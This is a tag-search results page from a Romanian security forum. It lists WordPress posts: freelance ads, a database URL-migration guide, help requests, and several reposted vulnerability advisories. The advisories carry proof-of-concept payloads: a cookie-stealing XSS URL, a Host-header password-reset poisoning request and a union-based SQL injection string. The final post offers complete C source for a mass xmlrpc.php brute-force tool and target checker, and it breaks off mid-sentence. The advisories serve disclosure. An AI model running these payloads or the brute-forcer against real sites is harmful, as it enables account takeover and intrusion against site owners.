Jump to content

Search the Community

Showing results for tags 'wordpress'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Biography


Location


Interests


Occupation

  1. Din lipsa de timp, nu ma voi mai ocupa de aplicatiile desktop. Creez site-uri mici si mijlocii, scripturi, pagini, bug fixes, optimizari. Scriu cod curat si comentat. UPDATE: Dupa ce am vazut zeci de scripturi/pagini facute de unu si de altu', pot sa spun ca scriu caligrafic! Pentru site-uri complete ma pot ocupa si de gazduire si de configurarea serverului astfel incat site-ul sa fie predat "la cheie". Ofer si mentenanta unde este cazul. Backend: PHP + MySQL Frontend: HTML + CSS + jQuery / Bootstrap Metode de plata: Paypal sau Transfer bancar Plata: La finalizarea proiectului sau esalonat, de la caz la caz. Email: net_wav3@yahoo.com Skype: wav3ee Telegram: https://t.me/wav3e
  2. Daca aveti nevoie sa schimbati domeniul pentru un wordpress sau sa schimbati protocolul (din http in https), trebuie sa actualizati toate link-urile prezente in baza de date, atat de la posturi cat si cele de la optiuni. Operatiunea este foarte simpla si aveti nevoie doar de acces MySQL. Puteti utiliza atat CLI cat si phpMyAdmin. Exemplu: update wp_options set option_value = replace(option_value, 'http://rstforums.com', 'https://rstforums.com') WHERE option_name = 'home' OR option_name = 'siteurl'; update wp_posts set guid = replace(guid, 'http://rstforums.com', 'https://rstforums.com'); update wp_posts set post_content = replace(post_content, 'http://rstforums.com', 'https://rstforums.com'); update wp_postmeta set meta_value = replace(meta_value, 'http://rstforums.com', 'https://rstforums.com'); Note: - In exemplul de mai sus domeniul vechi este rstforums.com pe http iar domeniul nou este rstforums.com pe https. - Exemplul este valabil si daca schimbati numele de domeniu, nu doar protocolul - Nu se adauga slash-ul de final dupa numele domeniului. - 'wp_' din numele tabelelor reprezinta prefixul. Este posibil sa aveti wordpress instalat cu alt prefix. In fisierul de configuratie "wp-config.php" puteti vedea prefixul la "$table_prefix" sau direct in mysql.
  3. Cunoștințe avansate PHP/ MySQL, HTML/CSS/JS (jQuery), Javascriptengleză nivel mediuExperienta in proiecte de ecommerce ( WordPress woocommerce, OpenCart, Prestashop, Magento ), implementare API.Vei lucra în cadrul unor proiecte de ecommerce. Căutăm oameni pro-activi, care rezolvă problemele până la capăt, și care au dorința și capacitatea de a crea propriile structuri și implementa propria viziune pentru soluționarea unui task.
  4. Detin un site dezvoltat pe platforma wp. Are o nisa buna, domeniul si continutul bine targhetate. Nu sunt specialist, nu sunt programator pro.... Ps. Detin site-ul de 3 ani, l-am tot modificat,.... Intrebarea mea: As vrea sa cresc cu el ! Cum procedez? La SEO sunt 0 ! Imi poate explica si mie cu ce sa incep?
  5. Caut pe cineva care are cunostinte pe wordpress ,pt a modifica o tema contra cost ,PM cu adresa skype
  6. WordPress User Login History plugin version 1.5.2 suffers from a cross site scripting vulnerability. Product: User Login History Wordpress Plugin - https://wordpress.org/plugins/user-login-history/ Vendor: Er Faiyaz Alam Tested version: 1.5.2 CVE ID: CVE-2017-15867 ** CVE description ** Multiple cross-site scripting (XSS) vulnerabilities in the user-login-history plugin through 1.5.2 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) date_from, (2) date_to, (3) user_id, (4) username, (5) country_name, (6) browser, (7) operating_system, or (8) ip_address parameter to admin/partials/listing/listing.php. ** Technical details ** The above-mentioned HTTP GET parameters are directly put into the value attribute of an HTML form field without proper sanitization. An attacker can close the HTML input tag with the "> (%22%3E) expression and inject arbitrary HTML/JavaScript code. Example of the vulnerable code with the date_from parameter (line 21): <td><input readonly="readonly" autocomplete="off" placeholder="<?php _e("From", "user-login-history") ?>" id="date_from" name="date_from" value="<?php echo isset($_GET['date_from']) ? $_GET['date_from'] : "" ?>" class="textfield-bg"></td> ** Proof of Concept ** Example using the user_id parameter: http://<host>/wordpress/wp-admin/admin.php?page=user-login-history&user_id=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E ** Solution ** Update to version 1.6. ** Timeline ** 15/10/2017: vendor contacted 15/10/2017: vendor acknowledgment 18/10/2017: fix pushed to GitHub 30/10/2017: fixed release available on WordPress Plugins Store. ** Credits ** Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI). ** References ** - WordPress-plugin-user-login-history GitHub : error log and xss and some minor improvements https://github.com/faiyazalam/WordPress-plugin-user-login-history/commit/519341a7dece59e2c589b908a636e6cf12a61741 -- Best Regards, Nicolas Buzy-Debat Orange Cyberdefense Singapore (CERT-LEXSI) _________________________________________________________________________________________________________________________ Ce message et ses pieces jointes peuvent contenir des informations confidentielles ou privilegiees et ne doivent donc pas etre diffuses, exploites ou copies sans autorisation. Si vous avez recu ce message par erreur, veuillez le signaler a l'expediteur et le detruire ainsi que les pieces jointes. Les messages electroniques etant susceptibles d'alteration, Orange decline toute responsabilite si ce message a ete altere, deforme ou falsifie. Merci. This message and its attachments may contain confidential or privileged information that may be protected by law; they should not be distributed, used or copied without authorisation. If you have received this email in error, please notify the sender and delete this message and its attachments. As emails may be altered, Orange is not liable for messages that have been modified, changed or falsified. Thank you. # 0day.today [2017-11-01] # Source: 0day.today
  7. ==================================================== - Discovered by: Dawid Golunski (@dawid_golunski) - dawid[at]legalhackers.com - https://legalhackers.com - ExploitBox.io (@Exploit_Box) - CVE-2017-8295 - Release date: 03.05.2017 - Revision 1.0 - Severity: Medium/High ============================================= I. VULNERABILITY ------------------------- WordPress Core <= 4.7.4 Potential Unauthorized Password Reset (0day) II. BACKGROUND ------------------------- "WordPress is a free and open-source content management system (CMS) based on PHP and MySQL. WordPress was used by more than 27.5% of the top 10 million websites as of February 2017. WordPress is reportedly the most popular website management or blogging system in use on the Web, supporting more than 60 million websites." https://en.wikipedia.org/wiki/WordPress III. INTRODUCTION ------------------------- Wordpress has a password reset feature that contains a vulnerability which might in some cases allow attackers to get hold of the password reset link without previous authentication. Such attack could lead to an attacker gaining unauthorised access to a victim's WordPress account. IV. DESCRIPTION ------------------------- The vulnerability stems from WordPress using untrusted data by default when creating a password reset e-mail that is supposed to be delivered only to the e-mail associated with the owner's account. This can be observed in the following code snippet that creates a From email header before calling a PHP mail() function: ------[ wp-includes/pluggable.php ]------ ... if ( !isset( $from_email ) ) { // Get the site domain and get rid of www. $sitename = strtolower( $_SERVER['SERVER_NAME'] ); if ( substr( $sitename, 0, 4 ) == 'www.' ) { $sitename = substr( $sitename, 4 ); } $from_email = 'wordpress@' . $sitename; } ... ----------------------------------------- As we can see, Wordpress is using SERVER_NAME variable to get the hostname of the server in order to create a From/Return-Path header of the outgoing password reset email. However, major web servers such as Apache by default set the SERVER_NAME variable using the hostname supplied by the client (within the HTTP_HOST header): https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname Because SERVER_NAME can be modified, an attacker could set it to an arbitrary domain of his choice e.g: attackers-mxserver.com which would result in Wordpress setting the $from_email to wordpress@attackers-mxserver.com and thus result in an outgoing email with From/Return-Path set to this malicious address. As to which e-mail header the attacker would be able to modify - From or Return-Path, it depends on the server environment. As can be read on http://php.net/manual/en/function.mail.php The From header sets also Return-Path under Windows. Depending on the configuration of the mail server, it may result in an email that gets sent to the victim WordPress user with such malicious From/Return-Path address set in the email headers. This could possibly allow the attacker to intercept the email containing the password reset link in some cases requiring user interaction as well as without user interaction. Some example scenarios include: * If attacker knows the email address of the victim user. They can perform a prior DoS attack on the victim's email account (e.g by sending multiple large files to exceed user's disk quota, or attacking the DNS server) in order to cause the password reset email to be rejected by the receiving server, or not reach the destination and thus get returned to the account on attacker's server * Some autoresponders might attach a copy of the email sent in the body of the auto-replied message * Sending multiple password reset emails to force the user to reply to the message to enquiry explanation for endless password reset emails. The reply containing the password link would then be sent to attacker. etc. V. PROOF OF CONCEPT ------------------------- If an attacker sends a request similar to the one below to a default Wordpress installation that is accessible by the IP address (IP-based vhost): -----[ HTTP Request ]---- POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1 Host: injected-attackers-mxserver.com Content-Type: application/x-www-form-urlencoded Content-Length: 56 user_login=admin&redirect_to=&wp-submit=Get+New+Password ------------------------ Wordpress will trigger the password reset function for the admin user account. Because of the modified HOST header, the SERVER_NAME will be set to the hostname of attacker's choice. As a result, Wordpress will pass the following headers and email body to the /usr/bin/sendmail wrapper: ------[ resulting e-mail ]----- Subject: [CompanyX WP] Password Reset Return-Path: <wordpress@attackers-mxserver.com> From: WordPress <wordpress@attackers-mxserver.com> Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Someone requested that the password be reset for the following account: http://companyX-wp/wp/wordpress/ Username: admin If this was a mistake, just ignore this email and nothing will happen. To reset your password, visit the following address: <http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin> ------------------------------- As we can see, fields Return-Path, From, and Message-ID, all have the attacker's domain set. The verification of the headers can be performed by replacing /usr/sbin/sendmail with a bash script of: #!/bin/bash cat > /tmp/outgoing-email VI. BUSINESS IMPACT ------------------------- Upon a successfull exploitation, attacker may be able to reset user's password and gain unauthorized access to their WordPress account. VII. SYSTEMS AFFECTED ------------------------- All WordPress versions up to the latest 4.7.4 VIII. SOLUTION ------------------------- No official solution available. As a temporary solution users can enable UseCanonicalName to enforce static SERVER_NAME value https://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname This issue was first reported to WordPress security team multiple times, with the first report sent in July 2016. As there has been no progress in this case , this advisory is finally released to the public without an official patch. IX. REFERENCES ------------------------- https://legalhackers.com https://ExploitBox.io Vendor site: https://wordpress.org http://httpd.apache.org/docs/2.4/mod/core.html#usecanonicalname http://php.net/manual/en/function.mail.php https://tools.ietf.org/html/rfc5321 X. CREDITS ------------------------- Discovered by Dawid Golunski dawid (at) legalhackers (dot) com https://legalhackers.com https://ExploitBox.io Thanks to BeyondSecurity for help with contacting the vendor. XI. REVISION HISTORY ------------------------- 03.05.2017 - Advisory released, rev. 1 XII. EXPLOITBOX - A PLAYGROUND FOR HACKERS ------------------------- ExploitBox.io is coming soon. Subscribe at https://ExploitBox.io to stay updated and be there for the launch. XIII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
  8. CODE : # # # # # # Exploit Title: WordPress Plugin PICA Photo Gallery v1.0 - SQL Injection # Google Dork: N/A # Date: 09.03.2017 # Vendor Homepage: https://www.apptha.com/ # Software: https://www.apptha.com/category/extension/Wordpress/PICA-Photo-Gallery # Demo: http://www.apptha.com/demo/pica-photo-gallery # Version: 1.0 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[@]ihsan[.]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/?aid=[SQL] # For example; # -3+/*!50000union*/+select+0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,2,3,@@version--+- # wpapptha_term_relationships,wpapptha_term_taxonomy,wpapptha_terms,wpapptha_usermeta,wpapptha_users # Etc.. # # # # # Source/Sursa: https://packetstormsecurity.com/files/141533/WordPress-PICA-Photo-Gallery-1.0-SQL-Injection.html
  9. WordPress version 4.5.3 Audio Playlist suffers from a cross site scripting vulnerability. CODE: ------------------------------------------------------------------------ WordPress audio playlist functionality is affected by Cross-Site Scripting ------------------------------------------------------------------------ Yorick Koster, July 2016 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Two Cross-Site Scripting vulnerabilities exists in the playlist functionality of WordPress. These issues can be exploited by convincing an Editor or Administrator into uploading a malicious MP3 file. Once uploaded the issues can be triggered by a Contributor or higher using the playlist shortcode. ------------------------------------------------------------------------ OVE ID ------------------------------------------------------------------------ OVE-20160717-0003 ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was successfully tested on the WordPress version 4.5.3. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ These issues are resolved in WordPress version 4.7.3. ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html It was discovered that meta information (ID3) stored in audio files are not properly sanitized in case they are uploaded by a user with the unfiltered_html (generally an Editor or Administrator). The first Cross-Site Scripting vulnerability exists in the function that processes the playlist shortcode, which is done in the wp_playlist_shortcode() method (/wp-includes/media.php). This method creates a <noscript> block for users with JavaScript disabled. The method wp_get_attachment_link() does not perform any output encoding on the link text. Meta information from the audio file is used in the link text, rendering wp_playlist_shortcode() vulnerable to Cross-Site Scripting. The second Cross-Site Scripting issue is DOM-based and exists in the JavaScript file /wp-includes/js/mediaelement/wp-playlist.js (or /wp-includes/js/mediaelement/wp-playlist.min.js). The WPPlaylistView object is used to render a audio player client side. The method renderTracks() uses the meta information from the audio file in a call to jQuery's append() method. No output encoding is used on the meta information, resulting in a Cross-Site Scripting vulnerability. Proof of concept The following MP3 file can be used to reproduce this issue: https://securify.nl/advisory/SFY20160742/xss.mp3 1) upload MP3 file to the Media Library (as Editor or Administrator). 2) Insert an Audio Playlist in a Post containing this MP3 (Create Audio Playlist). ------------------------------------------------------------------------ Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its goal is to contribute to the security of popular, widely used OSS projects in a fun and educational way. Sursa/Source: https://packetstormsecurity.com/files/141491/WordPress-4.5.3-Audio-Playlist-Cross-Site-Scripting.html
  10. Salut popor, Vreau să-mi iau domeniu și hosting de freehostingeu.com și mă interesează să aflu dacă pot cumva redirecţiona traficul de pe blogul meu pe wordpress pe noul domeniu?! Mulțumesc!
  11. Salut, puteti sa imi recomandati un player web pentru wordpress care sa preia link-urile de pe youtube si sa le redea unul dupa altul... sa semene ca un fel de televiziune live daca intelegeti ce vreau sa spun... Stiu ca se poate face playlist in youtube si incorpora link-ul, dar nu vreau ca omul sa aiba posibilitatea sa aleaga ce vrea el si sa se plimbe prin continut. Pentru orice alte detalii pe care le doriti, intrebati-ma. Multumesc anticipat!
  12. Salutare. Vad multe teme frumoase pentru hosting pentru platforma WordPress. Momentan folosesc whmcs dar as dori sa întreb: ce plugin este necesar pentru Wordpress ca sa pot face ceva asemănător cu whmcs (sa se poată face comenzi, tickete support, etc.)? Bănuiesc că se poate din moment ce exista sute de teme dedicate hostingului pentru wp.
  13. Salut, Am un plugin de wp pe care as dori sa-l modifc/updatez, caut o persoana capabila sa se ocupe cu dezvoltare pe partea de wordpress/woocommerce. cx.dany [@] yahoo.com Multumesc.
  14. Am de dat urmatoarele pe moca de pe themeforest.net. Acestea sunt cumparate de mine deci imi rezerv dreptul de a le da doar anumitor persoane cu vechime pe RST (care nu vor face magarii cu ele) Easy PHP Contact Form Script PHP Scripts - Easy PHP Contact Form Script | CodeCanyon HTML5 Music Player for WordPress with 3 Skins WordPress - HTML5 Music Player for WordPress with 3 Skins | CodeCanyon Nuvellen: Blog/Portfolio WordPress Theme WordPress - Núvellen: Blog / Portfolio WordPress Theme | ThemeForest King Size - Fullscreen Background WordPress Theme WordPress - King Size - Fullscreen Background WordPress Theme | ThemeForest Grid Powerpoint Grid Powerpoint | GraphicRiver John Doe's Blog - Clean WordPress blog theme http://themeforest.net/item/john-does-blog-clean-wordpress-blog-theme-/6603795 X The Theme (WordPress) http://themeforest.net/item/x-the-theme/5871901 Genesis - Responsive Moodle Theme http://themeforest.net/item/genesis-responsive-moodle-theme/5457547 Saga - Responsive Moodle Theme http://themeforest.net/item/saga-responsive-moodle-theme/5669197 Valoare totala 323 usd
  15. Un tutorial de pe udemy.com pentru ce-i incepatori , e gratuit. Dupa cum puteti vedea este vorba despre cum sa iti setezi hostu si sa iti instalezi wordpress . (imi cer scuze daca nu am postat unde trebuie , e primul post sper sa nu fie si ultimu' ) . Numa' bine tuturor. Web Hosting Set Up and WordPress Installation For Beginners
  16. Salut, am o problema pe care ma chinui sa o rezolv de 2 zile. Mi-am facut un site de filme online ( deocamdata e local) si cand postez un film imi apare tot continultu postului pe pagina. Eu vreau sa fac sa apara numele filmului cu poza si cand dau click sa ma duca la tot postul unde e si filmul in sine. Cum imi arata mie : hosting immagini Cum vreau sa apara: free image hosting Va multumesc !
  17. Am tot vazut brute-uri pentru Wordpress, dar majoritatea pe wp-login.php, asa ca am decis sa fac unul pentru xmlrpc.php. ===== brute.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE WP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <ips file> <userfile> <passfile> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *user, char *pass, FILE *outfile, char *link) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[1024], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>"); strcat(postvar, pass); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd,buffer,2047); if (n < 0) { exit(1); } if(strstr(buffer, "isAdmin")) { printf("[+]Found: %s%s - %s %s\n", victim, link, user, pass); outfile = fopen("wp.log", "a+"); fprintf(outfile, "%s%s - %s %s\n", victim, link, user, pass); fclose(outfile); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char *ip, user[1024], invtmp[1024], pass[1024], *link, tok[1024], processed[512000]; processed[0]=0; time_t start; if (argc < 5) usage(argv[0]); printf("[*] List: %s Threads: %s FILE: %s\n", argv[1], argv[2], argv[3]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } fclose(ipfile); if(!(userfile = fopen(argv[2], "r"))) { printf("INVALID USERS FILE: %s\n", argv[2]); exit(0); } fclose(userfile); if(!(passfile = fopen(argv[3], "r"))) { printf("INVALID PASSWORDS FILE: %s\n", argv[3]); exit(0); } fclose(passfile); if(!(badfile = fopen("error.tmp", "r"))) badfile = fopen("error.tmp", "a+"); fclose(badfile); if(!(badfile = fopen("wp.log", "r"))) badfile = fopen("wp.log", "a+"); fclose(badfile); userfile = fopen(argv[2], "r"); while(1) { if(!fgets((char *)&user, sizeof(user), userfile)) break; if (user[strlen (user) - 1] == '\n') user[strlen (user) - 1] = '\0'; if (user) { passfile = fopen(argv[3], "r"); while (1) { if(!fgets((char *)&pass, sizeof(pass), passfile)) break; if (pass[strlen (pass) - 1] == '\n') pass[strlen (pass) - 1] = '\0'; if (pass) { badfile = fopen("wp.log", "r"); strcpy(processed, ""); while (1) { if(!fgets((char *)&invtmp, sizeof(invtmp), badfile)) break; strcat(processed, invtmp); } fclose(badfile); ipfile = fopen(argv[1], "r"); while (1) { if(!fgets((char *)&tok, sizeof(tok), ipfile)) break; if (tok[strlen (tok) - 1] == '\n') tok[strlen (tok) - 1] = '\0'; if (tok) { char ip2[256], pass2[256]; ip = strtok(tok, " "); link = strtok(NULL, " "); strcpy(ip2, ip); strcpy(pass2, pass); if(strstr(pass2, "DOMAIN%")) { if(ip2[strlen(ip2)-5] == '.') ip2[strlen(ip2)-5] = '\0'; if(ip2[strlen(ip2)-4] == '.') ip2[strlen(ip2)-4] = '\0'; if(ip2[strlen(ip2)-3] == '.') ip2[strlen(ip2)-3] = '\0'; if(strstr(ip2, "www.")) { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=4;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcat(tmpass, tmp); strcpy(pass2, tmpass); } else { char tmp[128],tmpass[128]; int ivar,jvar=0; for(ivar=0;ivar<strlen(ip2);ivar++) { tmp[jvar] = ip2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcpy(tmpass, tmp); strcpy(tmp, ""); jvar=0; for(ivar=7;ivar<strlen(pass2);ivar++) { tmp[jvar] = pass2[ivar]; tmp[jvar+1] = '\0'; jvar++; } strcat(tmpass, tmp); strcpy(pass2, tmpass); } } if(!strstr(processed, ip)) { if(!(fork())) { getvuln(ip,user,pass2,outfile,link); exit(0); } else { numforks++; if (numforks > atoi(argv[4])) for (numforks; numforks > atoi(argv[4]); numforks--) wait(NULL); } } } } fclose(ipfile); } } fclose(passfile); } } fclose(userfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } ===== checker.c ===== #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <stdio.h> #include <errno.h> #include <fcntl.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/wait.h> #include <unistd.h> #define RED "\E[32;31m" #define GREEN "\E[32;40m" #define NORMAL "\E[m" void usage(char *s); int getvuln(char *victim, char *link, FILE *outfile); FILE *ipfile, *userfile, *passfile, *outfile, *badfile; int numforks = 0; void usage(char *s) { printf(RED"ELITE SMTP BruteF0rce"); printf(GREEN"\n"GREEN); printf("Smoke w33d everyday;)\n"NORMAL); printf("Usage: %s <IPs file> <threads>\n", s); exit(EXIT_SUCCESS); } int getvuln(char *victim, char *link, FILE *outfile) { int sockfd, n, rc, valopt; struct sockaddr_in serv_addr; struct hostent *server; struct timeval timeout, tread; size_t ulen, plen; long arg; fd_set myset; socklen_t lon; struct hostent *hl = gethostbyname(victim); if(!hl) exit(0); long ipadd; memset(&ipadd, 0, sizeof(ipadd)); memcpy(&ipadd, hl->h_addr, hl->h_length); timeout.tv_sec = 4; timeout.tv_usec = 0; tread.tv_sec = 10; tread.tv_usec = 0; char buffer[2048], postvar[2048], clen[256]; sockfd = socket(AF_INET, SOCK_STREAM, 0); arg = fcntl(sockfd, F_GETFL, NULL); arg |= O_NONBLOCK; fcntl(sockfd, F_SETFL, arg); if (sockfd < 0) { perror("ERROR opening socket"); exit(1); } if (setsockopt (sockfd, SOL_SOCKET, SO_RCVTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); if (setsockopt (sockfd, SOL_SOCKET, SO_SNDTIMEO, (char *)&tread, sizeof(tread)) < 0) error("setsockopt failed\n"); bzero(&serv_addr,sizeof(serv_addr)); serv_addr.sin_family = AF_INET; serv_addr.sin_addr.s_addr=ipadd; serv_addr.sin_port=htons(80); if (connect(sockfd,(struct sockaddr *)&serv_addr,sizeof(serv_addr)) < 0) { if (errno == EINPROGRESS) { FD_ZERO(&myset); FD_SET(sockfd, &myset); if (select(sockfd+1, NULL, &myset, NULL, &timeout) > 0) { lon = sizeof(int); getsockopt(sockfd, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon); if (valopt) { exit(0); } } else { exit(0); } } else { exit(0); } } arg = fcntl(sockfd, F_GETFL, NULL); arg &= (~O_NONBLOCK); fcntl(sockfd, F_SETFL, arg); strcpy(postvar, "<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>"); strcat(postvar, "<string>admin</string></value></param><param><value><string>narecumsafie55"); strcat(postvar, "</string></value></param></params></methodCall>"); sprintf(clen, "%d", strlen(postvar)); bzero(buffer, 2048); strcpy(buffer, "POST "); strcat(buffer, link); strcat(buffer, " HTTP/1.1\r\n"); strcat(buffer, "Host: "); strcat(buffer, victim); strcat(buffer, "\r\nConnection: keep-alive\r\n"); strcat(buffer, "Content-Length: "); strcat(buffer, clen); strcat(buffer, "\r\nCache-Control: max-age=0\r\n"); strcat(buffer, "User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8\r\n"); strcat(buffer, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); strcat(buffer, "Content-Type: application/x-www-form-urlencoded\r\n"); strcat(buffer, "Accept-Language: en-US,en;q=0.8\r\n"); strcat(buffer, "Cookie: wordpress_test_cookie=WP+Cookie+check"); strcat(buffer, "\r\n\r\n"); strcat(buffer, postvar); strcat(buffer, "\r\n\r\n"); n = write(sockfd,buffer,strlen(buffer)); if (n < 0) { exit(1); } bzero(buffer,2048); n = read(sockfd, buffer, 2047); if (n < 0) { exit(1); } if(strstr(buffer, "<int>403</int>")) { printf("[+]Found: %s - %s\n", victim, link); fprintf(outfile, "%s %s\n", victim, link); } close(sockfd); return 0; } int main(int argc, char *argv[]) { char ip[1024]; time_t start; if (argc < 2) usage(argv[0]); outfile = fopen("out.log", "a+"); printf("[*] List: %s Threads: %s FILE: out.log\n", argv[1], argv[2]); start = time(0); if(!(ipfile = fopen(argv[1], "r"))) { printf("INVALID DOMAINS FILE: %s\n", argv[1]); exit(0); } while(1) { if(!fgets((char *)&ip, sizeof(ip), ipfile)) break; if (ip[strlen(ip)-1] == '\n') ip[strlen(ip)-1] = '\0'; if (ip) { if(!(fork())) { getvuln(ip,"/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } if(!(fork())) { getvuln(ip,"/blog/xmlrpc.php",outfile); exit(0); } else { numforks++; if (numforks > atoi(argv[2])) for (numforks; numforks > atoi(argv[2]); numforks--) wait(NULL); } } } fclose(ipfile); printf("[*] Completed in: %lu secs\n", (time(0) - start)); exit(EXIT_SUCCESS); } Pentru compilare: gcc -o checker checker.c gcc -o brute brute.c Folositi checker pe 